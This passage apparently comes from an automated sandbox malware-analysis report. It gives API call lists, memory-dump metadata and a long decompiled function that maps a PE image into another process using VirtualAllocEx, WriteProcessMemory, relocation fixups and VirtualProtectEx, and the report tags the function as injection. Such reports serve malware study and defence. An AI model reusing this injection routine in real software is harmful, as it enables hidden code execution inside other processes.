GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,?,?), ref: 006E570F
LookupAccountSidW.ADVAPI32(00000000,?,?,00000100,?,00000100,?), ref: 006E574E
CreateProcessAsUserW.ADVAPI32(00000000,00000000,?,00000000,00000000,00000000,?,?,00000000,?,?), ref: 006E581D
GetLastError.KERNEL32 ref: 006E5847
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 006E58C9
CloseHandle.KERNEL32(?), ref: 006E58D3

Strings

, xrefs: 006E577D

Memory Dump Source

Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6e0000_______.jbxd

Similarity

API ID: Token$Process$AddressCloseHandleOpenProc$Information$AdjustLookupPrivileges$AccountAllocateCreateCurrentDuplicateEqualErrorInfoInitializeLastLibraryLoadPrivilegeRevertSelfStartupUserValue
String ID:
API String ID: 896487261-3916222277
Opcode ID: 4f4843edd1fd936821691727b56b4c936eabc0d34232ec55b06e010286ddc87f
Instruction ID: ce39252ce57d30ffd2a469b59e324e2bb411f306cbe1415cc5a79b9086ae66ea
Opcode Fuzzy Hash: 4f4843edd1fd936821691727b56b4c936eabc0d34232ec55b06e010286ddc87f
Instruction Fuzzy Hash: 56C17F70609751AFE7248F61DC44BABBBEAFF84744F00491DF586C62A0DBB1D905CB62

Uniqueness

Uniqueness Score: -1.00%

Function 006F0920, Relevance: 24.6, APIs: 16, Instructions: 640
injectionmemorystringCOMMONCrypto

Download Yara Rule

C-Code - Quality: 85%

			E006F0920(void* __ecx, void* __eflags) {
				void* _v16;
				long _v128;
				void* _v132;
				long _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				long* _v156;
				long _v160;
				char _v164;
				signed short* _v168;
				long _v172;
				void* _v176;
				intOrPtr _v180;
				long* _v184;
				long _v192;
				void _v196;
				void _v200;
				long _v204;
				intOrPtr _v208;
				long* _v212;
				intOrPtr _v216;
				intOrPtr _v220;
				intOrPtr _v224;
				intOrPtr _v228;
				long _v232;
				intOrPtr _v236;
				long _v240;
				void* _v244;
				void* _v248;
				void* _v252;
				void* _v256;
				long _v260;
				long _v264;
				long _v268;
				long _v272;
				intOrPtr _v276;
				void* _v280;
				void* _v284;
				long _v288;
				long _v292;
				long _v296;
				intOrPtr _t299;
				void* _t300;
				void* _t302;
				intOrPtr _t312;
				long _t316;
				long _t317;
				long _t318;
				long* _t321;
				intOrPtr _t322;
				void* _t323;
				unsigned int _t326;
				intOrPtr _t327;
				long _t328;
				long _t337;
				signed int _t338;
				long _t342;
				long _t346;
				long _t350;
				long _t352;
				long _t354;
				long _t357;
				long _t359;
				long _t360;
				long* _t361;
				long _t362;
				signed int _t363;
				long _t364;
				intOrPtr _t367;
				void* _t368;
				long _t369;
				signed short* _t370;
				unsigned int _t372;
				intOrPtr* _t374;
				intOrPtr _t383;
				void* _t385;
				long _t390;
				void* _t394;
				long* _t395;
				long _t397;
				void* _t398;
				long _t401;
				long _t404;
				long _t426;
				long* _t430;
				long _t431;
				long** _t434;
				long _t437;
				long _t448;
				long _t449;
				void* _t464;
				void* _t467;
				SIZE_T* _t469;
				intOrPtr _t471;
				long _t473;
				intOrPtr _t476;
				intOrPtr* _t480;
				intOrPtr _t481;
				long _t483;
				long _t486;
				intOrPtr _t487;
				long _t488;
				long _t490;
				long _t491;
				void* _t493;
				long* _t495;
				long _t496;
				void* _t497;
				signed int _t499;
				void _t501;
				void _t504;
				long _t506;
				long _t507;
				void* _t508;
				signed int _t509;
				void* _t512;
				void* _t514;

				_t508 = __ecx;
				_t486 = 0;
				E006F6610( &_v280, 0, 0x100);
				_t512 = (_t509 & 0xfffffff8) - 0x118 + 0xc;
				if( *((intOrPtr*)(_t508 + 0x80)) != 0) {
					L26:
					return _t486;
				}
				E006F7C90( *(_t508 + 0x60),  *((intOrPtr*)(_t508 + 0x64)));
				_t514 = _t512 + 8;
				_t394 =  *(_t508 + 0x60);
				_v280 = _t394;
				if(( *_t394 & 0x0000ffff) != 0x5a4d) {
					L21:
					_t529 =  *((intOrPtr*)(_t508 + 0x80));
					if( *((intOrPtr*)(_t508 + 0x80)) == 0) {
						E006F5320(_t508, _t529);
					}
					L23:
					_t295 = _v244;
					if(_v244 != 0) {
						E006E91E0(_t295);
						_t514 = _t514 + 4;
					}
					E006F7C90( *(_t508 + 0x60),  *((intOrPtr*)(_t508 + 0x64)));
					_t486 =  *((intOrPtr*)(_t508 + 0x5c));
					goto L26;
				}
				_t299 =  *((intOrPtr*)(_t394 + 0x3c));
				_t487 = _t394 + _t299;
				_v276 = _t487;
				if( *((intOrPtr*)(_t394 + _t299)) != 0x4550) {
					goto L21;
				}
				_t300 = VirtualAllocEx( *(_t508 + 0x70),  *(_t487 + 0x34),  *(_t487 + 0x50), 0x2000, 0x40);
				_v256 = _t300;
				if(_t300 == 0) {
					__eflags = GetLastError() - 0x1e7;
					if(__eflags != 0) {
						goto L21;
					}
					_t300 = VirtualAllocEx( *(_t508 + 0x70), 0,  *(_t487 + 0x50), 0x2000, 0x40);
					__eflags = _t300;
					_v256 = _t300;
					if(__eflags != 0) {
						goto L4;
					}
					goto L21;
				}
				L4:
				_v232 = _t300 -  *(_t487 + 0x34);
				_t302 = VirtualAllocEx( *(_t508 + 0x70), _t300,  *(_t487 + 0x54), 0x1000, 4);
				_v252 = _t302;
				if(_t302 == 0) {
					goto L21;
				}
				_v284 =  *((intOrPtr*)(_t487 + 0x80));
				_v288 = _t302;
				_v268 = E006E9E90(_t508,  *((intOrPtr*)(_t487 + 0x80)));
				_t469 =  &_v296;
				_v232 = _v288;
				_v228 =  *((intOrPtr*)(_t487 + 0x84));
				_v224 =  *((intOrPtr*)(_t487 + 0xd8));
				_v220 =  *((intOrPtr*)(_t487 + 0xdc));
				_v216 =  *((intOrPtr*)(_t487 + 0x78));
				_v212 =  *((intOrPtr*)(_t487 + 0x7c));
				 *((intOrPtr*)(_t487 + 0xd8)) = 0;
				 *((intOrPtr*)(_t487 + 0xdc)) = 0;
				 *((intOrPtr*)(_t487 + 0x84)) = 0;
				 *((intOrPtr*)(_t487 + 0x80)) = 0;
				 *((intOrPtr*)(_t487 + 0x7c)) = 0;
				 *((intOrPtr*)(_t487 + 0x78)) = 0;
				_t488 =  *(_t487 + 0x54);
				 *_t469 = 0;
				if(WriteProcessMemory( *(_t508 + 0x70), _v292, _t394, _t488, _t469) == 0 || _v292 != _t488) {
					goto L21;
				} else {
					_t312 = _v276;
					 *((intOrPtr*)(_t312 + 0x80)) = _v228;
					 *((intOrPtr*)(_t312 + 0x84)) = _v224;
					 *((intOrPtr*)(_t312 + 0xd8)) = _v220;
					 *((intOrPtr*)(_t312 + 0xdc)) = _v216;
					 *((intOrPtr*)(_t312 + 0x78)) = _v212;
					 *((intOrPtr*)(_t312 + 0x7c)) = _v208;
					_v292 = 0;
					if(VirtualProtectEx( *(_t508 + 0x70), _v252,  *(_t312 + 0x54), 2,  &_v292) == 0) {
						goto L21;
					}
					_t471 = _v276;
					_t316 = _t471 + ( *(_t471 + 0x14) & 0x0000ffff) + 0x18;
					_v272 = _t316;
					if( *(_t471 + 6) == 0) {
						L27:
						__eflags = _v232;
						if(_v232 == 0) {
							L41:
							_t490 = _v264;
							__eflags = _t490;
							if(_t490 == 0) {
								L64:
								__eflags =  *(_t508 + 0x68);
								if( *(_t508 + 0x68) == 0) {
									_t395 = _v212;
									_t317 = E006E9E90(_t508, _t395);
									__eflags = _t317;
									_v264 = _t317;
									if(__eflags == 0) {
										goto L21;
									}
									_t491 = _t317;
									_t318 = E006E9E90(_t508,  *((intOrPtr*)(_t317 + 0x1c)));
									_v288 = _t318;
									_v160 = _t318;
									_v160 = E006E9E90(_t508,  *((intOrPtr*)(_t491 + 0x20)));
									_v160 = E006E9E90(_t508,  *((intOrPtr*)(_t491 + 0x24)));
									_v156 = _t395;
									_v152 = _t395 + _v220;
									__eflags =  *(_t491 + 0x14);
									if( *(_t491 + 0x14) == 0) {
										_t321 = _t508 + 0xa0;
										L103:
										__eflags =  *_t321;
										if(__eflags == 0) {
											goto L21;
										}
										__eflags =  *(_t508 + 0xa4);
										if(__eflags == 0) {
											goto L21;
										}
										__eflags =  *(_t508 + 0xa8);
										if(__eflags == 0) {
											goto L21;
										}
										__eflags =  *(_t508 + 0xac);
										if(__eflags != 0) {
											goto L65;
										}
										goto L21;
									}
									_t430 = _v284;
									_t398 = 0;
									_v288 = _t508 + 0xa0;
									while(1) {
										_v156 =  &(_t430[1]);
										_t337 =  *_t430;
										__eflags = _t337;
										_v136 = _t337;
										if(_t337 == 0) {
											goto L100;
										}
										__eflags = _t337 - _v144;
										if(_t337 < _v144) {
											L87:
											_t431 =  *(_t491 + 0x18);
											__eflags = _t431;
											if(_t431 == 0) {
												goto L100;
											}
											_t476 = _v148;
											_t338 = 0;
											__eflags = 0;
											while(1) {
												__eflags = _t398 - ( *(_t476 + _t338 * 2) & 0x0000ffff);
												if(_t398 == ( *(_t476 + _t338 * 2) & 0x0000ffff)) {
													break;
												}
												_t338 = _t338 + 1;
												__eflags = _t338 - _t431;
												if(_t338 < _t431) {
													continue;
												}
												goto L100;
											}
											_v132 = 0;
											_v136 = E006E9E90(_t508,  *((intOrPtr*)(_v152 + _t338 * 4)));
											_t495 =  &_v128;
											E006F7160(_t495, 0x60);
											_t514 = _t514 + 8;
											_t342 =  *((intOrPtr*)( *0x6f9d8c))(_v136, _t495);
											__eflags = _t342;
											if(_t342 == 0) {
												 *_v296 = _v264 + _v144;
											} else {
												E006F7160(_t495, 0x61);
												_t514 = _t514 + 8;
												_t346 =  *0x6f9d8c(_v140, _t495);
												__eflags = _t346;
												if(_t346 == 0) {
													 *(_t508 + 0xa4) = _v272 + _v152;
												} else {
													E006F7160(_t495, 0x62);
													_t514 = _t514 + 8;
													_t350 =  *0x6f9d8c(_v148, _t495);
													__eflags = _t350;
													if(_t350 == 0) {
														_t352 = _v280 + _v160;
														__eflags = _t352;
														 *(_t508 + 0xa8) = _t352;
													} else {
														E006F7160(_t495, 0x63);
														_t514 = _t514 + 8;
														_t354 =  *0x6f9d8c(_v156, _t495);
														__eflags = _t354;
														if(_t354 == 0) {
															 *(_t508 + 0xac) = _v168 + _v288;
														}
													}
												}
											}
											goto L100;
										}
										__eflags = _t337 - _v140;
										if(_t337 < _v140) {
											goto L100;
										}
										goto L87;
										L100:
										_t491 = _v260;
										_t398 = _t398 + 1;
										__eflags = _t398 -  *(_t491 + 0x14);
										if(_t398 <  *(_t491 + 0x14)) {
											_t430 = _v156;
											continue;
										}
										_t321 = _v288;
										goto L103;
									}
								}
								L65:
								_t322 = _v276;
								__eflags =  *((short*)(_t322 + 6));
								if( *((short*)(_t322 + 6)) == 0) {
									L77:
									_t323 = _v256;
									 *((intOrPtr*)(_t508 + 0x5c)) = _t323;
									_v292 = 0;
									_push(0);
									_push(1);
									_push(_t323);
									_push( &_v292);
									_push(3);
									_push( *((intOrPtr*)( *(_t508 + 0x60) +  *((intOrPtr*)( *(_t508 + 0x60) + 0x3c)) + 0x28)) + _t323);
									_push(_t508);
									E006F3FA0();
									_t514 = _t514 + 0x1c;
									__eflags = _v292;
									if(_v292 != 0) {
										L79:
										 *((intOrPtr*)(_t508 + 0x80)) = 1;
										goto L23;
									}
									__eflags =  *(_t508 + 0x68);
									if(__eflags == 0) {
										goto L21;
									}
									goto L79;
								}
								_t493 = 0;
								__eflags = 0;
								_t397 = 8;
								do {
									_t473 = _v272;
									_t326 =  *(_t473 + _t397 + 0x1c);
									asm("bt eax, 0x1d");
									if(__eflags < 0) {
										asm("bt eax, 0x1e");
										if(__eflags >= 0) {
											__eflags = _t326;
											_t327 = 0x10;
											_t426 = 0x80;
											L74:
											_t328 =  <  ? _t426 : _t327;
											L75:
											_v128 = _t328;
											_v288 =  *((intOrPtr*)(_t473 + _t397));
											_v292 = 0;
											_v284 =  *(_t508 + 0x70);
											__eflags = VirtualProtectEx(_v284, _v256 +  *((intOrPtr*)(_t473 + _t397 + 4)), _v288, _t328,  &_v292);
											if(__eflags == 0) {
												goto L21;
											}
											goto L76;
										}
										_t328 = (_t326 >> 0x0000001a & 0xffffffe0) + 0x20;
										goto L75;
									}
									asm("bt eax, 0x1e");
									if(__eflags >= 0) {
										__eflags = _t326;
										_t327 = 1;
										_t426 = 8;
										goto L74;
									}
									_t328 = (_t326 >> 0x1f) + (_t326 >> 0x1f) + 2;
									goto L75;
									L76:
									_t493 = _t493 + 1;
									_t397 = _t397 + 0x28;
									__eflags = _t493 - ( *(_v276 + 6) & 0x0000ffff);
								} while (__eflags < 0);
								goto L77;
							}
							_t434 =  &_v184;
							while(1) {
								__eflags =  *_t490;
								if( *_t490 != 0) {
									goto L61;
								}
								L57:
								__eflags =  *(_t490 + 0x10);
								if( *(_t490 + 0x10) != 0) {
									goto L61;
								}
								__eflags =  *(_t490 + 8);
								if( *(_t490 + 8) != 0) {
									goto L61;
								}
								__eflags =  *(_t490 + 0xc);
								if( *(_t490 + 0xc) != 0) {
									goto L61;
								}
								__eflags =  *(_t490 + 4);
								if( *(_t490 + 4) == 0) {
									goto L64;
								}
								L61:
								_v164 = 0;
								 *((intOrPtr*)(_t434 + 0xc)) = 0;
								 *((intOrPtr*)(_t434 + 8)) = 0;
								 *((intOrPtr*)(_t434 + 4)) = 0;
								 *_t434 = 0;
								_t357 =  *(_t490 + 0xc);
								__eflags = _t357;
								if(_t357 == 0) {
									do {
										__eflags =  *_t490;
										if( *_t490 != 0) {
											goto L61;
										}
										goto L57;
									} while (_t357 == 0);
								}
								_t359 = E006E6740(_t508, __eflags, E006E9E90(_t508, _t357));
								__eflags = _t359;
								_v192 = _t359;
								if(__eflags != 0) {
									_t496 = _v264;
									_t360 =  *_t496;
									_v160 = _t360;
									__eflags = _t360;
									_t437 =  *(_t496 + 0x10);
									if(_t360 == 0) {
										_t360 = _t437;
										_v160 = _t437;
									}
									_v288 = _t437;
									_t361 = E006E9E90(_t508, _t360);
									_v184 = _t361;
									_v180 = _v292 + _v260;
									_t362 =  *_t361;
									__eflags = _t362;
									if(_t362 == 0) {
										L55:
										_t490 = _t496 + 0x14;
										__eflags = _t490;
										_t434 =  &_v184;
										_v264 = _t490;
										continue;
									} else {
										_t497 =  &_v164;
										while(1) {
											__eflags = _t362;
											if(__eflags < 0) {
												_t363 = _t362 & 0x0000ffff;
											} else {
												_t368 = E006E9E90(_t508, _t362);
												_v176 = _t368;
												_t363 = _t368 + 2;
											}
											_t364 = E006F3100(_t508, __eflags, _v184, _t363);
											__eflags = _t364;
											_v172 = _t364;
											if(__eflags == 0) {
												goto L21;
											}
											_v292 = 0;
											__eflags = WriteProcessMemory( *(_t508 + 0x70), _v176, _t497, 4,  &_v292);
											if(__eflags == 0) {
												goto L21;
											}
											__eflags = _v292 - 4;
											if(__eflags != 0) {
												goto L21;
											}
											_t367 = _v180;
											_v180 = _t367 + 4;
											_v176 = _v176 + 4;
											_t362 =  *(_t367 + 4);
											__eflags = _t362;
											if(_t362 != 0) {
												continue;
											}
											_t496 = _v264;
											goto L55;
										}
										goto L21;
									}
								}
								goto L21;
							}
						}
						_t369 = E006E9E90(_t508,  *((intOrPtr*)(_t471 + 0xa0)));
						__eflags = _t369;
						_v272 = _t369;
						if(_t369 == 0) {
							goto L41;
						}
						__eflags =  *_t369;
						if( *_t369 != 0) {
							do {
								_t370 = _t369 + 8;
								_t480 =  &_v200;
								_t448 =  *((intOrPtr*)(_t369 + 4)) + 0xfffffff8 >> 1;
								__eflags = _t448;
								_v204 = _t448;
								 *((intOrPtr*)(_t480 + 8)) = 0;
								 *_t480 = 0;
								 *((intOrPtr*)(_t480 + 0xc)) = 0;
								 *((intOrPtr*)(_t480 + 4)) = 0;
								_v168 = _t370;
								if(_t448 == 0) {
									goto L40;
								} else {
									goto L32;
								}
								do {
									L32:
									_t499 =  *_t370 & 0x0000ffff;
									_t372 = _t499 >> 0xc;
									__eflags = _t372 - 0xa;
									if(_t372 == 0xa) {
										_t501 = (_t499 & 0x00000fff) +  *_v268;
										_v200 = _t501;
										_t374 = E006E9E90(_t508, _t501);
										asm("adc eax, 0x0");
										_v196 =  *_t374 + _v236;
										_v192 =  *(_t374 + 4);
										_v296 = 0;
										__eflags = WriteProcessMemory( *(_t508 + 0x70), _t501 + _v260,  &_v196, 8,  &_v296);
										if(__eflags == 0) {
											goto L21;
										}
										__eflags = _v292 - 8;
										if(__eflags != 0) {
											goto L21;
										}
										goto L39;
									}
									__eflags = _t372 - 3;
									if(_t372 != 3) {
										goto L39;
									}
									_t504 = (_t499 & 0x00000fff) +  *_v268;
									_v200 = _t504;
									_v200 = _v236 +  *((intOrPtr*)(E006E9E90(_t508, _t504)));
									_v296 = 0;
									__eflags = WriteProcessMemory( *(_t508 + 0x70), _t504 + _v260,  &_v200, 4,  &_v296);
									if(__eflags == 0) {
										goto L21;
									}
									__eflags = _v292 - 4;
									if(__eflags == 0) {
										goto L39;
									}
									goto L21;
									L39:
									_t370 =  &(_v168[1]);
									_v168 = _t370;
									_t156 =  &_v204;
									 *_t156 = _v204 - 1;
									__eflags =  *_t156;
								} while ( *_t156 != 0);
								L40:
								_t449 = _v268;
								_t481 =  *((intOrPtr*)(_t449 + 4));
								_t369 = _t481 + _t449;
								_v268 = _t369;
								__eflags =  *(_t481 + _t449);
							} while ( *(_t481 + _t449) != 0);
						}
						goto L41;
					} else {
						_t401 = 0;
						_v284 = 1;
						while(1) {
							_t483 =  >  ?  *((intOrPtr*)(_t316 + _t401 + 8)) :  *((intOrPtr*)(_t316 + _t401 + 0x10));
							_v240 = _t483;
							_t383 =  *((intOrPtr*)(_t316 + _t401 + 0xc));
							_v236 = _t383;
							_t385 = VirtualAllocEx( *(_t508 + 0x70), _t383 + _v256, _t483, 0x1000, 4);
							_v248 = _t385;
							if(_t385 == 0) {
								goto L21;
							}
							_v244 = E006E3180(_v240, _v244);
							_v288 = _t401;
							E006F6610(_t386, 0, _v240);
							_t514 = _t514 + 0x14;
							_t506 = _v240;
							_v292 = 0;
							_t404 = _v288;
							__eflags = WriteProcessMemory( *(_t508 + 0x70), _v248, _v244, _t506,  &_v292);
							if(__eflags == 0) {
								goto L21;
							}
							__eflags = _v292 - _t506;
							if(__eflags != 0) {
								goto L21;
							}
							_t390 = _v272;
							_t507 =  *(_t390 + _t404 + 0x10);
							__eflags = _t507;
							if(_t507 == 0) {
								L15:
								_t471 = _v276;
								_t464 = _v284;
								__eflags = _t464 - ( *(_t471 + 6) & 0x0000ffff);
								if(_t464 >= ( *(_t471 + 6) & 0x0000ffff)) {
									goto L27;
								} else {
									_t316 = _v272;
									_t401 = _t404 + 0x28;
									__eflags = _t401;
									_v284 = _t464 + 1;
									continue;
								}
							}
							_t467 =  *(_t508 + 0x60) +  *((intOrPtr*)(_t390 + _t404 + 0x14));
							_v292 = 0;
							_t404 = _v288;
							__eflags = WriteProcessMemory( *(_t508 + 0x70), _v248, _t467, _t507,  &_v292);
							if(__eflags == 0) {
								goto L21;
							}
							__eflags = _v292 - _t507;
							if(__eflags != 0) {
								goto L21;
							}
							goto L15;
						}
						goto L21;
					}
				}
			}

0x006f092f
0x006f0931
0x006f093e
0x006f0943
0x006f094c
0x006f0c62
0x006f0c6b
0x006f0c6b
0x006f0958
0x006f095d
0x006f0960
0x006f0963
0x006f096f
0x006f0c30
0x006f0c30
0x006f0c37
0x006f0c3b
0x006f0c3b
0x006f0c40
0x006f0c40
0x006f0c46
0x006f0c49
0x006f0c4e
0x006f0c4e
0x006f0c57
0x006f0c5f
0x00000000
0x006f0c5f
0x006f0975
0x006f0978
0x006f097b
0x006f0986
0x00000000
0x00000000
0x006f099c
0x006f09a4
0x006f09a8
0x006f0c08
0x006f0c0d
0x00000000
0x00000000
0x006f0c1e
0x006f0c24
0x006f0c26
0x006f0c2a
0x00000000
0x00000000
0x00000000
0x006f0c2a
0x006f09ae
0x006f09b3
0x006f09c5
0x006f09cd
0x006f09d1
0x00000000
0x00000000
0x006f09df
0x006f09e4
0x006f09ed
0x006f09f5
0x006f09f9
0x006f0a03
0x006f0a0d
0x006f0a17
0x006f0a1e
0x006f0a25
0x006f0a2b
0x006f0a31
0x006f0a37
0x006f0a3d
0x006f0a43
0x006f0a46
0x006f0a49
0x006f0a4f
0x006f0a61
0x00000000
0x006f0a71
0x006f0a71
0x006f0a7d
0x006f0a87
0x006f0a91
0x006f0a9b
0x006f0aa5
0x006f0aac
0x006f0ab9
0x006f0acf
0x00000000
0x00000000
0x006f0ad5
0x006f0add
0x006f0ae1
0x006f0aea
0x006f0c6e
0x006f0c6e
0x006f0c73
0x006f0dca
0x006f0dca
0x006f0dce
0x006f0dd0
0x006f0f11
0x006f0f11
0x006f0f15
0x006f101f
0x006f1026
0x006f102b
0x006f102d
0x006f1031
0x00000000
0x00000000
0x006f1037
0x006f103e
0x006f1043
0x006f1047
0x006f1058
0x006f1069
0x006f1070
0x006f107b
0x006f1082
0x006f1086
0x006f11f9
0x006f11ff
0x006f11ff
0x006f1202
0x00000000
0x00000000
0x006f1208
0x006f120f
0x00000000
0x00000000
0x006f1215
0x006f121c
0x00000000
0x00000000
0x006f1222
0x006f1229
0x00000000
0x00000000
0x00000000
0x006f122f
0x006f108c
0x006f1096
0x006f1098
0x006f10a5
0x006f10a8
0x006f10af
0x006f10b1
0x006f10b3
0x006f10ba
0x00000000
0x00000000
0x006f10c0
0x006f10c7
0x006f10d6
0x006f10d6
0x006f10d9
0x006f10db
0x00000000
0x00000000
0x006f10e1
0x006f10e8
0x006f10e8
0x006f10ea
0x006f10ee
0x006f10f0
0x00000000
0x00000000
0x006f10f2
0x006f10f3
0x006f10f5
0x00000000
0x00000000
0x00000000
0x006f10f7
0x006f10fc
0x006f1118
0x006f1121
0x006f1129
0x006f112e
0x006f113e
0x006f1140
0x006f1142
0x006f11bd
0x006f1144
0x006f1147
0x006f114c
0x006f1157
0x006f115d
0x006f115f
0x006f11cc
0x006f1161
0x006f1164
0x006f1169
0x006f1174
0x006f117a
0x006f117c
0x006f11d8
0x006f11d8
0x006f11df
0x006f117e
0x006f1181
0x006f1186
0x006f1191
0x006f1197
0x006f1199
0x006f11a6
0x006f11a6
0x006f1199
0x006f117c
0x006f115f
0x00000000
0x006f1142
0x006f10c9
0x006f10d0
0x00000000
0x00000000
0x00000000
0x006f11e5
0x006f11e5
0x006f11e9
0x006f11ea
0x006f11ed
0x006f109e
0x00000000
0x006f109e
0x006f11f3
0x00000000
0x006f11f3
0x006f10a5
0x006f0f1b
0x006f0f1b
0x006f0f1f
0x006f0f24
0x006f0fd2
0x006f0fd2
0x006f0fd8
0x006f0fdb
0x006f0feb
0x006f0fec
0x006f0fee
0x006f0ff3
0x006f0ff4
0x006f0ff6
0x006f0ff7
0x006f0ff8
0x006f0ffd
0x006f1000
0x006f1004
0x006f1010
0x006f1010
0x00000000
0x006f1010
0x006f1006
0x006f100a
0x00000000
0x00000000
0x00000000
0x006f100a
0x006f0f2a
0x006f0f2a
0x006f0f2c
0x006f0f31
0x006f0f31
0x006f0f35
0x006f0f39
0x006f0f3d
0x006f0f4e
0x006f0f52
0x006f0f6d
0x006f0f6f
0x006f0f74
0x006f0f79
0x006f0f79
0x006f0f7c
0x006f0f7c
0x006f0f86
0x006f0f95
0x006f0f9d
0x006f0fb6
0x006f0fb8
0x00000000
0x00000000
0x00000000
0x006f0fb8
0x006f0f5a
0x00000000
0x006f0f5a
0x006f0f3f
0x006f0f43
0x006f0f5f
0x006f0f61
0x006f0f66
0x00000000
0x006f0f66
0x006f0f48
0x00000000
0x006f0fbe
0x006f0fc2
0x006f0fc3
0x006f0fca
0x006f0fca
0x00000000
0x006f0f31
0x006f0dd6
0x006f0eba
0x006f0eba
0x006f0ebd
0x00000000
0x00000000
0x006f0ebf
0x006f0ebf
0x006f0ec3
0x00000000
0x00000000
0x006f0ec5
0x006f0ec9
0x00000000
0x00000000
0x006f0ecb
0x006f0ecf
0x00000000
0x00000000
0x006f0ed1
0x006f0ed5
0x00000000
0x00000000
0x006f0ed7
0x006f0ed7
0x006f0ede
0x006f0ee1
0x006f0ee4
0x006f0ee7
0x006f0ee9
0x006f0eec
0x006f0eee
0x006f0eba
0x006f0eba
0x006f0ebd
0x00000000
0x00000000
0x00000000
0x006f0ebd
0x006f0eba
0x006f0efb
0x006f0f00
0x006f0f02
0x006f0f06
0x006f0de1
0x006f0de5
0x006f0de7
0x006f0dee
0x006f0df0
0x006f0df3
0x006f0df5
0x006f0df7
0x006f0df7
0x006f0dfe
0x006f0e05
0x006f0e0e
0x006f0e16
0x006f0e1a
0x006f0e1c
0x006f0e1e
0x006f0eaf
0x006f0eaf
0x006f0eaf
0x006f0eb2
0x006f0eb6
0x00000000
0x006f0e24
0x006f0e24
0x006f0e2b
0x006f0e2b
0x006f0e2d
0x006f0e40
0x006f0e2f
0x006f0e32
0x006f0e37
0x006f0e3b
0x006f0e3b
0x006f0e4a
0x006f0e4f
0x006f0e51
0x006f0e58
0x00000000
0x00000000
0x006f0e69
0x006f0e7d
0x006f0e7f
0x00000000
0x00000000
0x006f0e85
0x006f0e8a
0x00000000
0x00000000
0x006f0e90
0x006f0e9c
0x006f0ea0
0x006f0ea4
0x006f0ea7
0x006f0ea9
0x00000000
0x00000000
0x006f0eab
0x00000000
0x006f0eab
0x00000000
0x006f0e2b
0x006f0e1e
0x00000000
0x006f0f0c
0x006f0eba
0x006f0c81
0x006f0c86
0x006f0c88
0x006f0c8c
0x00000000
0x00000000
0x006f0c92
0x006f0c95
0x006f0ca1
0x006f0ca4
0x006f0ca7
0x006f0cb0
0x006f0cb2
0x006f0cb4
0x006f0cb8
0x006f0cbb
0x006f0cbd
0x006f0cc0
0x006f0cc3
0x006f0cca
0x00000000
0x00000000
0x00000000
0x00000000
0x006f0cd0
0x006f0cd0
0x006f0cd0
0x006f0cd5
0x006f0cd8
0x006f0cda
0x006f0d45
0x006f0d47
0x006f0d4c
0x006f0d5a
0x006f0d5d
0x006f0d65
0x006f0d70
0x006f0d84
0x006f0d86
0x00000000
0x00000000
0x006f0d8c
0x006f0d91
0x00000000
0x00000000
0x00000000
0x006f0d91
0x006f0cdc
0x006f0cde
0x00000000
0x00000000
0x006f0cf0
0x006f0cf2
0x006f0d02
0x006f0d11
0x006f0d25
0x006f0d27
0x00000000
0x00000000
0x006f0d2d
0x006f0d32
0x00000000
0x00000000
0x00000000
0x006f0d97
0x006f0d9e
0x006f0da1
0x006f0da8
0x006f0da8
0x006f0da8
0x006f0da8
0x006f0db2
0x006f0db2
0x006f0db6
0x006f0db9
0x006f0dbc
0x006f0dc0
0x006f0dc0
0x006f0ca1
0x00000000
0x006f0af0
0x006f0af2
0x006f0af5
0x006f0bc5
0x006f0bcf
0x006f0bd2
0x006f0bd6
0x006f0bda
0x006f0bee
0x006f0bf6
0x006f0bfa
0x006f0c00
0x006f0c00
0x006f0b0e
0x006f0b16
0x006f0b1e
0x006f0b23
0x006f0b26
0x006f0b35
0x006f0b3e
0x006f0b4c
0x006f0b4e
0x00000000
0x00000000
0x006f0b54
0x006f0b58
0x00000000
0x00000000
0x006f0b5e
0x006f0b62
0x006f0b66
0x006f0b68
0x006f0ba5
0x006f0ba5
0x006f0ba9
0x006f0bb1
0x006f0bb3
0x00000000
0x006f0bb9
0x006f0bb9
0x006f0bbe
0x006f0bbe
0x006f0bc1
0x00000000
0x006f0bc1
0x006f0bb3
0x006f0b70
0x006f0b7c
0x006f0b85
0x006f0b93
0x006f0b95
0x00000000
0x00000000
0x006f0b9b
0x006f0b9f
0x00000000
0x00000000
0x00000000
0x006f0b9f
0x00000000
0x006f0bc5
0x006f0aea

APIs

VirtualAllocEx.KERNEL32(?,?,?,00002000,00000040), ref: 006F099C
VirtualAllocEx.KERNEL32(?,00000000,?,00001000,00000004), ref: 006F09C5
WriteProcessMemory.KERNEL32(?,?,?,?,?,?), ref: 006F0A59
VirtualProtectEx.KERNEL32(?,?,?,00000002,?), ref: 006F0AC7
WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 006F0B46
WriteProcessMemory.KERNEL32(?,?,?,00000001,?), ref: 006F0B8D
VirtualAllocEx.KERNEL32(?,?,?,00001000,00000004), ref: 006F0BEE
GetLastError.KERNEL32 ref: 006F0C02
VirtualAllocEx.KERNEL32(?,00000000,?,00002000,00000040), ref: 006F0C1E
WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000,00000000,?), ref: 006F0D23
WriteProcessMemory.KERNEL32(?,?,?,00000008,00000000,00000000,?), ref: 006F0D82
WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,?,00000000,00000000,?), ref: 006F0E77
VirtualProtectEx.KERNEL32(?,00000000,?,00000010,00000000,?,?,?,?), ref: 006F0FB0
lstrcmp.KERNEL32(?,?), ref: 006F1157
lstrcmp.KERNEL32(?,?), ref: 006F1174
lstrcmp.KERNEL32(?,?), ref: 006F1191

Memory Dump Source

Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6e0000_______.jbxd

Similarity

